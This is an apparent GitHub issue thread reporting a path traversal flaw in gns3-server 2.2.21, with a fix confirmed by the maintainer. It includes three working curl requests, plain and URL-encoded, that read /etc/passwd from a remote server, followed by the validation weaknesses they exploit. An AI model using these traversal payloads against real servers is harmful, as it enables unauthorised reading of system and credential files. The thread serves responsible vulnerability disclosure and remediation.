### ISSUE TITLE
gns3-server allows reading of all files on remote server

### ISSUE THREAD

**Issue by candlerb** [GNS3/gns3-server#1894]
This is with a remote gns3-server 2.2.21:

```
$ curl --path-as-is http://x.x.x.x:3080/v2/compute/qemu/images/foo/../../../../../../etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
... etc
```

Variation without dot:

```
$ curl http://x.x.x.x:3080/v2/compute/qemu/images/foo/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
... etc
```

Variation without dot or slash:

```
$ curl http://x.x.x.x:3080/v2/compute/qemu/images/foo%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
...
```

I only tried qemu/images; there are several other [API endpoints](https://gns3-server.readthedocs.io/en/latest/endpoints.html) which allow a path or filename to be specified.

## Analysis

At the qemu/images endpoint, gns3 only performs minimal validation of the image path request:

- it calls `get_abs_image_path`, which validates non-local requests, but only if they [start with slash](https://github.com/GNS3/gns3-server/blob/master/gns3server/compute/base_manager.py#L497)
- it checks that it does not [start with dot](https://github.com/GNS3/gns3-server/blob/master/gns3server/handlers/api/compute/qemu_handler.py#L574-L576)

However it's easy to circumvent both these, as in the examples given.  

## Suggestions

* Reject `/../` *anywhere* within the filename (after doing URL decoding)
* Don't use `if not os.path.isabs(path)` to decide whether to do additional validation. Always validate non-local requests.
* Use [os.path.normpath](https://docs.python.org/3/library/os.path.html#os.path.normpath) before validating whether the requested path is within an allowed directory
* Is there any reason why people would store files in subdirectories of the images directory? If not, then I would be inclined to reject slashes entirely in the requested filename

**Comment by grossmj** [comment]
Thanks for sharing this. I just have one question. Was gns3server started with the `--local` parameter?

**Comment by candlerb** [comment]
No.

```
$ ps auxwww | grep gns3-server
gns3     24576  0.1  0.0 3085704 54668 ?       Ssl  May10   6:24 /usr/share/gns3/gns3-server/bin/python /usr/bin/gns3server --config /etc/gns3/gns3_server.conf

$ cat /etc/gns3/gns3_server.conf
[Server]
images_path = /var/lib/GNS3/images
projects_path = /var/lib/GNS3/projects
configs_path = /var/lib/GNS3/configs
appliances_path = /var/lib/GNS3/appliances
symbols_path = /var/lib/GNS3/symbols
report_errors = True

auth = True
user = XXXXXXXX
password = XXXXXXXX

[Qemu]
enable_kvm = True
require_kvm = False
```

**Comment by grossmj** [comment]
Thanks again, this is concerning and we are going to fix this asap.

**Comment by grossmj** [comment]
It should be fixed now on both 2.2 and 3.0 branches. It wasn't easy to cover all cases but now I think we have something solid.

I added more tests on `3.0` and we will most likely forbid any access outside default directories in `3.0` as well, even with the local mode enabled.

Thanks again for reporting this :+1:
